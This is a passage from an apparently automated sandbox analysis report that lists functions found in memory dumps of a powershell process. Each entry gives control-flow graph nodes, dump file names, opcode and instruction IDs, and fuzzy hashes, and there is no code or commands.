                                                                control_flow_graph 1429 35f3358-35f336f 1430 35f33e8-35f3412 1429->1430 1431 35f3371-35f3378 1429->1431 1439 35f3425-35f3458 1430->1439 1440 35f3414-35f341e 1430->1440 1431->1430 1432 35f337a-35f33e0 1431->1432 1432->1430 1447 35f345e-35f3489 1439->1447 1448 35f3585-35f3589 1439->1448 1440->1439 1454 35f348b-35f34a5 1447->1454 1455 35f34d5-35f351a 1447->1455 1449 35f358f-35f3596 1448->1449 1450 35f358b-35f358d 1448->1450 1453 35f3598-35f35b3 1449->1453 1450->1453 1464 35f35f5-35f3610 1453->1464 1465 35f35b5-35f35f0 1453->1465 1460 35f34ae-35f34d2 1454->1460 1461 35f34a7 1454->1461 1466 35f351c-35f3536 1455->1466 1467 35f3568-35f357d 1455->1467 1460->1455 1461->1460 1478 35f368d-35f36a8 1464->1478 1479 35f3612-35f3622 1464->1479 1484 35f373b-35f3742 1465->1484 1474 35f353f-35f3566 1466->1474 1475 35f3538 1466->1475 1467->1448 1474->1467 1475->1474 1490 35f36de-35f36f9 1478->1490 1491 35f36aa-35f36dc 1478->1491 1481 35f364d-35f3688 1479->1481 1482 35f3624-35f3640 1479->1482 1481->1484 1505 35f3642 call 35f37b9 1482->1505 1506 35f3642 call 35f37d0 1482->1506 1486 35f3648 1486->1484 1490->1484 1498 35f36fb-35f3733 1490->1498 1491->1484 1498->1484 1505->1486 1506->1486
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.441487657.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_35f0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 1cb3c5a743ecea17fcd325bdb130d8ba82bbca5a2a4f292b106aeab64549e5d4
                                                                • Instruction ID: 7156a4dd6a9cd6c010f589bee8144014841967fa9689e51eff2324ced10d5ded
                                                                • Opcode Fuzzy Hash: 1cb3c5a743ecea17fcd325bdb130d8ba82bbca5a2a4f292b106aeab64549e5d4
                                                                • Instruction Fuzzy Hash: F6B17D34B00605DFDB15DF64D894AAEBBF6FF88600F18856DE9469B351DB35AC028B60
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 035F53F2, Relevance: .3, Instructions: 273COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1507 35f53f2-35f5421 1509 35f542d-35f544d 1507->1509 1510 35f5423-35f542a 1507->1510 1512 35f54ee-35f568c 1509->1512 1513 35f5453-35f54eb 1509->1513 1532 35f568e-35f5694 1512->1532 1533 35f56a4-35f570a 1512->1533 1534 35f5698-35f569a 1532->1534 1535 35f5696 1532->1535 1553 35f570d call 35f5e78 1533->1553 1554 35f570d call 35f5e68 1533->1554 1534->1533 1535->1533 1541 35f5713-35f5785 1547 35f5787-35f5795 1541->1547 1548 35f57b4 1541->1548 1547->1548 1550 35f5797-35f57b2 1547->1550 1550->1548 1553->1541 1554->1541
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.441487657.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_35f0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 4db44b5d1042e27fbd425638d7f8e31d29346dfe8cdc06885f4549537c177116
                                                                • Instruction ID: 4164de371a06f556594671b851adb9507205bfc6baf123e7a937f630bed11ea6
                                                                • Opcode Fuzzy Hash: 4db44b5d1042e27fbd425638d7f8e31d29346dfe8cdc06885f4549537c177116
                                                                • Instruction Fuzzy Hash: 91B18075A00208DFDB14DFA4D880ADDBBB6FF89310F248569E505AB391DB71AD52CF90
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 035FA570, Relevance: .3, Instructions: 271COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.441487657.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_35f0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 5bd3811ef617c2f6effed5e90d60441c752ad3e1c3794c38545b36c78ad42b36
                                                                • Instruction ID: 6d8f43a1b166f40c1aa1fd4950fd9e7717af68843cfe75fe94fe18fe46018f4a
                                                                • Opcode Fuzzy Hash: 5bd3811ef617c2f6effed5e90d60441c752ad3e1c3794c38545b36c78ad42b36
                                                                • Instruction Fuzzy Hash: 38A16E39B002088FCB14EBA5D994AADB7F2FF89304F64856CD509AF394DB709D068F95
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 035F26E0, Relevance: .3, Instructions: 258COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.441487657.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_35f0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 05a27ff93407a893d6d5d2a9732749142085853c86beed3b0eba1027ead72f06
                                                                • Instruction ID: ab35cf0d954b0a800bbdfe289ec84cc358f7dc4d62ef8279f1bba76ddde92f5e
                                                                • Opcode Fuzzy Hash: 05a27ff93407a893d6d5d2a9732749142085853c86beed3b0eba1027ead72f06
                                                                • Instruction Fuzzy Hash: 87B1CF78A00209CFCB14DF98D584A99B7F2FF48314F298999E905AB365DB70FD46CB80
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 035F8210, Relevance: .2, Instructions: 250COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.441487657.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_35f0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: befabeb01c8ed379bff0c87e1dd0c0009185a97052214b30237eadd6cfcb3d99
                                                                • Instruction ID: df91022302de0574d614afc206f76d8cfec807b6fd7856e50508ff022528cd08
                                                                • Opcode Fuzzy Hash: befabeb01c8ed379bff0c87e1dd0c0009185a97052214b30237eadd6cfcb3d99
                                                                • Instruction Fuzzy Hash: 7A818E39B006049FDB14DB64E844AAEB7E6EBC8364F198479D509DF351CF35EC018BA1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 08400440, Relevance: .2, Instructions: 250COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.463115200.0000000008400000.00000040.00000001.sdmp, Offset: 08400000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_8400000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 19b35601561f8720b6958867152719bcb78af523c64c8add38b6b2f2f818283f
                                                                • Instruction ID: c3f8a05ee22d4c5a957b9e611db0bbd82c6ba6550a6f39feac393dc35c714027
                                                                • Opcode Fuzzy Hash: 19b35601561f8720b6958867152719bcb78af523c64c8add38b6b2f2f818283f
                                                                • Instruction Fuzzy Hash: 4181B435B046549FDB10DA6C8460B6BFBA2EFC5226F1884BFD945CB381DB31C942CBA1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 035FA561, Relevance: .2, Instructions: 242COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.441487657.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_35f0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 19ccd8db64f4f57045ccb3c23b62572cf5e48420a497656a67099e552bde993e
                                                                • Instruction ID: 8e667c12229b361ca04ccab78ba5ace1e4f7a6eb6c838ab3a3f17cef2e405917
                                                                • Opcode Fuzzy Hash: 19ccd8db64f4f57045ccb3c23b62572cf5e48420a497656a67099e552bde993e
                                                                • Instruction Fuzzy Hash: 1C916D34A002089FCB14EFA5D994AADBBF2FF89304F248568D509AF394DB719D06CF91
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 035F2B48, Relevance: .2, Instructions: 240COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.441487657.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_35f0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f92b15a2f83d8a36a432557973bbbec2088337609cbf57849094b3efd8d157d9
                                                                • Instruction ID: 79c873d8ae3742f5174bb3731bb426d4950d063ff1240836f510167c0e39ac6c
                                                                • Opcode Fuzzy Hash: f92b15a2f83d8a36a432557973bbbec2088337609cbf57849094b3efd8d157d9
                                                                • Instruction Fuzzy Hash: E3918F38A00204DFDB14DB68E454B9DBBF2FF88315F5889A9DA05AB3A1DB35EC05CB51
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 035FC260, Relevance: .2, Instructions: 238COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.441487657.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_35f0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 75d13a0bfffc087e37268ea042f149d15ab591ad7333a713848ea05deb611cbe
                                                                • Instruction ID: 88e4d654ec4858c87dc85d983e553a80d689baf2579acd37cb7b57626984df3f
                                                                • Opcode Fuzzy Hash: 75d13a0bfffc087e37268ea042f149d15ab591ad7333a713848ea05deb611cbe
                                                                • Instruction Fuzzy Hash: D4B12774A00319CFDB14DF65D844B9EBBB2FF89300F1585A9D908AB350DB70A985CF91
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 08418EE7, Relevance: .2, Instructions: 237COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.463142967.0000000008410000.00000040.00000001.sdmp, Offset: 08410000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_8410000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 67113fbfff4af9f09b0d4967c565b4e7e9f3a05e3ac982e03e0b606fd24241c4
                                                                • Instruction ID: 1dcc6eb03c9bd8cae6a737ad42c7623de7b8d9557e9cc16fff20caa3aa93da98
                                                                • Opcode Fuzzy Hash: 67113fbfff4af9f09b0d4967c565b4e7e9f3a05e3ac982e03e0b606fd24241c4
                                                                • Instruction Fuzzy Hash: E6A16D38A00209DFDB14DF69C4A0AAEBBB2EF89314F14896DE4559F351CB31EC46CB91
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 08412370, Relevance: .2, Instructions: 226COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.463142967.0000000008410000.00000040.00000001.sdmp, Offset: 08410000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_8410000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a0ba41d64522667f8bfe33e1a54ee34374f5293b06d87fffb6e7cebd1ee77342
                                                                • Instruction ID: 844990d8e7d881fd92d584233d8447dee4f8e6cce5f5e0df74cc8745676247b1
                                                                • Opcode Fuzzy Hash: a0ba41d64522667f8bfe33e1a54ee34374f5293b06d87fffb6e7cebd1ee77342
                                                                • Instruction Fuzzy Hash: 7C917B387002008FDB14EB34E494BAEB7E7EFC8205F24856DD54A9B391DF75AC068BA5
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 035F3BB7, Relevance: .2, Instructions: 222COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.441487657.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_35f0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e69123389b296bf71e0559b9226056a894f04e3962c806361a4e520256b50ee8
                                                                • Instruction ID: 3701ea3f46239068cc48b6c18d889930dcdb3fd7fed7897ba533b5e294e6a8af
                                                                • Opcode Fuzzy Hash: e69123389b296bf71e0559b9226056a894f04e3962c806361a4e520256b50ee8
                                                                • Instruction Fuzzy Hash: AEA10778A002058FDB14DF65D484D99BBB2BF8C320F5996A5D905AB3B6DB30EC85CF90
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 05316C81, Relevance: .2, Instructions: 221COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.448403496.0000000005310000.00000040.00000001.sdmp, Offset: 05310000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_5310000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2384025603db9a45fb67549ab6ef5a25c51172084c1d02e03e8ed08a47a1ff2d
                                                                • Instruction ID: ecb7cbb77633a3b8a470ac356c210fcea8dc12e1adc1c308ca9f0a8d054c8425
                                                                • Opcode Fuzzy Hash: 2384025603db9a45fb67549ab6ef5a25c51172084c1d02e03e8ed08a47a1ff2d
                                                                • Instruction Fuzzy Hash: 4CA13A74A01218DFCB04DFA4C494ADDBBF6BF89314F1884A8D805AF395CB759D85CBA0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0841EFB8, Relevance: .2, Instructions: 209COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.463142967.0000000008410000.00000040.00000001.sdmp, Offset: 08410000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_8410000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: b0dce6b239a6a90ed95ce6d89dabc2a44791bd58a1ed248048bafa1b3be393ae
                                                                • Instruction ID: d4a478ed510907f3b28f40fb43e8bff55d9cd9aab769cba0fffc320aa8c9b475
                                                                • Opcode Fuzzy Hash: b0dce6b239a6a90ed95ce6d89dabc2a44791bd58a1ed248048bafa1b3be393ae
                                                                • Instruction Fuzzy Hash: EB917D34A00209DFCF04DFA4D454BAEBBB2FF89301F148069E805AB355DB75AD4ACB61
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 035F5F48, Relevance: .2, Instructions: 199COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.441487657.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_35f0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: bbd46439a627787344f2dc24345f1c7d8bc463abc8a787ca34082678c5f33811
                                                                • Instruction ID: b5317b5b8a0b3252bd17c0a739bdd1139b16cfe565873c51397a3f7f27f3944c
                                                                • Opcode Fuzzy Hash: bbd46439a627787344f2dc24345f1c7d8bc463abc8a787ca34082678c5f33811
                                                                • Instruction Fuzzy Hash: DB814C35A00208DFCB14DF68E994EA9BBF6FF48304F188969E605AB361D771EC45CB90
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 08416B38, Relevance: .2, Instructions: 195COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.463142967.0000000008410000.00000040.00000001.sdmp, Offset: 08410000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_8410000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 5748f1bee14de5fba1d6683aa80610d405a4be730008d74bc9bdc759b0daa7ce
                                                                • Instruction ID: 514197f4fb1dc941c91c8fd0dd1ce1004bcb313c1aa87a1981458bcd7bd0e3cb
                                                                • Opcode Fuzzy Hash: 5748f1bee14de5fba1d6683aa80610d405a4be730008d74bc9bdc759b0daa7ce
                                                                • Instruction Fuzzy Hash: 36510C38B002489BDF19ABB9C8207AE7AE7EFC8714F25442DD5069B3C4DF758C0587A6
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 08410688, Relevance: .2, Instructions: 184COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.463142967.0000000008410000.00000040.00000001.sdmp, Offset: 08410000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_8410000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: bacc2d548dfadb091bf142db1406b34421bdc8c8f04878a434d361913348a1cb
                                                                • Instruction ID: eb07442dca1ffa2d9a265e2a5a1ab0cf170e7c875012f86cb2169506a9ef6a62
                                                                • Opcode Fuzzy Hash: bacc2d548dfadb091bf142db1406b34421bdc8c8f04878a434d361913348a1cb
                                                                • Instruction Fuzzy Hash: 04518138704700CFCB14EB65D45096ABBA6EFC9215B58892ED1468F365DF70AC4ACBE2
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0531CAF0, Relevance: .2, Instructions: 169COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.448403496.0000000005310000.00000040.00000001.sdmp, Offset: 05310000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_5310000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 37c01e696beff529e08b7d66e01bda74552018834405d127a796d9a49e6acb0c
                                                                • Instruction ID: 059a27ba0d4a15bd14f6d3ccadcf9f126bf7cebb2caaed4ab3fa45eba9e9e2c6
                                                                • Opcode Fuzzy Hash: 37c01e696beff529e08b7d66e01bda74552018834405d127a796d9a49e6acb0c
                                                                • Instruction Fuzzy Hash: 1F619F746002448FD71ADB34C454BAE7BF2AF89304F2485ADE8569F3A1CB35DC46CB95
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0841EF08, Relevance: .2, Instructions: 167COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.463142967.0000000008410000.00000040.00000001.sdmp, Offset: 08410000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_8410000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 19883d10738f0a060bab41a5ca216a7ece6fefed3adf2114304f70bf065b3a07
                                                                • Instruction ID: 4af4d7a8e7f1e020358f5953294af7f6e5ec38371e4ea3b1df63f95b3d9ed403
                                                                • Opcode Fuzzy Hash: 19883d10738f0a060bab41a5ca216a7ece6fefed3adf2114304f70bf065b3a07
                                                                • Instruction Fuzzy Hash: E051F775A093859FDB06DB68D8647DD7F71EF46215F0500ABD481CF297DB24880EC7A2
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 08412360, Relevance: .2, Instructions: 166COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.463142967.0000000008410000.00000040.00000001.sdmp, Offset: 08410000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_8410000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: ab2cd2e4251098c651b60f6e132aec5fce7b9c06378563ec351403efc2de2315
                                                                • Instruction ID: a29f14e0045d7beda44c3bce71f8010cc3e44e2c072fe39b21fe7c66c2df69c2
                                                                • Opcode Fuzzy Hash: ab2cd2e4251098c651b60f6e132aec5fce7b9c06378563ec351403efc2de2315
                                                                • Instruction Fuzzy Hash: 1061AE386002108FDB14EB34D594BAEB7F3EFC8205F24856DD54A9B3A1DB75AD068BA1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0531CED8, Relevance: .2, Instructions: 165COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.448403496.0000000005310000.00000040.00000001.sdmp, Offset: 05310000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_5310000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 9bcfd4a8d9ed8db8c59c4f233e09fc42bc0c9b60df2ac82ba74799ced877562a
                                                                • Instruction ID: 5ebd70e91586f25b9277b179d5c9e95b4b958139aafaeb11142746092dd63598
                                                                • Opcode Fuzzy Hash: 9bcfd4a8d9ed8db8c59c4f233e09fc42bc0c9b60df2ac82ba74799ced877562a
                                                                • Instruction Fuzzy Hash: 78615D34B002058FCB54EF78D590A9D77F2EF89314B248AA8D519AF361DB71AD05CBA1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 08415A90, Relevance: .2, Instructions: 161COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.463142967.0000000008410000.00000040.00000001.sdmp, Offset: 08410000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_8410000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 24feb58e93311ff3ebee8e7823f4c189d204d6cc62bfb359aab33ec301227ab1
                                                                • Instruction ID: f98a48203eab0e9e85c07925e48e55124e0b9372d42664e0bd0080c6e6924ab7
                                                                • Opcode Fuzzy Hash: 24feb58e93311ff3ebee8e7823f4c189d204d6cc62bfb359aab33ec301227ab1
                                                                • Instruction Fuzzy Hash: 40519B39B002198FDB14EF74C454ADEB7F2EFC8315F258AA8D105AB350DBB5AD058BA1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0531CEE8, Relevance: .2, Instructions: 160COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.448403496.0000000005310000.00000040.00000001.sdmp, Offset: 05310000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_5310000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 0e956211f5c1c13627ad43da6cad56cfd7c9347af1a41fedd8393c300c63f010
                                                                • Instruction ID: 25c4a521eacdc2f690465aedb9f4a9d6437b34bba4c3a427695d4ed35237252c
                                                                • Opcode Fuzzy Hash: 0e956211f5c1c13627ad43da6cad56cfd7c9347af1a41fedd8393c300c63f010
                                                                • Instruction Fuzzy Hash: 60615034B002058FCB54EF78D550A9D77F2FF8D314B248AA8D519AF361DB71AD058BA1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 05317358, Relevance: .2, Instructions: 158COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.448403496.0000000005310000.00000040.00000001.sdmp, Offset: 05310000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_5310000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: fa9e0358c0af59ccd5f38eeb8e75aa1205ef42f386c9f8f0a6eef5e787718172
                                                                • Instruction ID: 9f0174836f81a862ae083e4fed65dd7921412228a9b173f1e8c1c557225adba8
                                                                • Opcode Fuzzy Hash: fa9e0358c0af59ccd5f38eeb8e75aa1205ef42f386c9f8f0a6eef5e787718172
                                                                • Instruction Fuzzy Hash: E55101747042049FCB28DA38D810AAE7BE7EB85248B58492DD946CB790DB71DD05C7E2
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 084188B8, Relevance: .2, Instructions: 150COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.463142967.0000000008410000.00000040.00000001.sdmp, Offset: 08410000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_8410000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 7a6d0ea091de77a0d023e0f4e8b009f5f17ae954cb6d5685732de60d6e881f2f
                                                                • Instruction ID: ea6d76988b27bc959373fa179b267826370c52195fba75ab0f5546a5e4055bb7
                                                                • Opcode Fuzzy Hash: 7a6d0ea091de77a0d023e0f4e8b009f5f17ae954cb6d5685732de60d6e881f2f
                                                                • Instruction Fuzzy Hash: 2B515A74A00205DFDB18DF64D884BAEBBB6BF88345F14457EE815AB3A1DB34E845CB50
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 084188C8, Relevance: .1, Instructions: 148COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.463142967.0000000008410000.00000040.00000001.sdmp, Offset: 08410000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_8410000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 95afff605e9b77bac6c2b9df5f3b44b3be49ec7599efcecc461a39113ab59c51
                                                                • Instruction ID: b5172702c515d8205fdceaf7cae41535bec7a5fadead08b4e714a98a52a1dc8d
                                                                • Opcode Fuzzy Hash: 95afff605e9b77bac6c2b9df5f3b44b3be49ec7599efcecc461a39113ab59c51
                                                                • Instruction Fuzzy Hash: DC514674A00205DFDB18DF64D884BAEBBB6FF88345F14847DE816AB3A1DB34A845CB50
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 08412BF0, Relevance: .1, Instructions: 144COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.463142967.0000000008410000.00000040.00000001.sdmp, Offset: 08410000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_8410000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: b8b1aefe70230aa7ee3e47b375ccbefd1e81068627c0d7664349285e1d7afbca
                                                                • Instruction ID: dc14e6f23b53bffd28ceddf22f7debd869e1a364f42dbed7e17025ab4450a75f
                                                                • Opcode Fuzzy Hash: b8b1aefe70230aa7ee3e47b375ccbefd1e81068627c0d7664349285e1d7afbca
                                                                • Instruction Fuzzy Hash: 1441A235B002188BDB15EBB8C8507AE7BABEFCC214F14842ED606E7384DF745C4587A6
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 053178D8, Relevance: .1, Instructions: 140COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.448403496.0000000005310000.00000040.00000001.sdmp, Offset: 05310000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_5310000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: dc67b074c0d074f650043d1aa17f1de4da7becb5ed3492f1bfe914f104b06625
                                                                • Instruction ID: db4fbd9b66d913aba6c297e942c4a19c31f1d39af51e5b9aa63b4811a3591751
                                                                • Opcode Fuzzy Hash: dc67b074c0d074f650043d1aa17f1de4da7becb5ed3492f1bfe914f104b06625
                                                                • Instruction Fuzzy Hash: 28517C793006008FC745DF38E458A597BE2FF89215B2981ADD406CB7A2CF75ED46CB90
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 08416950, Relevance: .1, Instructions: 140COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.463142967.0000000008410000.00000040.00000001.sdmp, Offset: 08410000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_8410000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 1aa54c1480d60389c5d78499c941438ca55e08deb303ace05445d87920ea5c3f
                                                                • Instruction ID: ab0903e8cc08b93fa6b09fd23652f2500bd43a9dd4052b3245176a0afc3b80b9
                                                                • Opcode Fuzzy Hash: 1aa54c1480d60389c5d78499c941438ca55e08deb303ace05445d87920ea5c3f
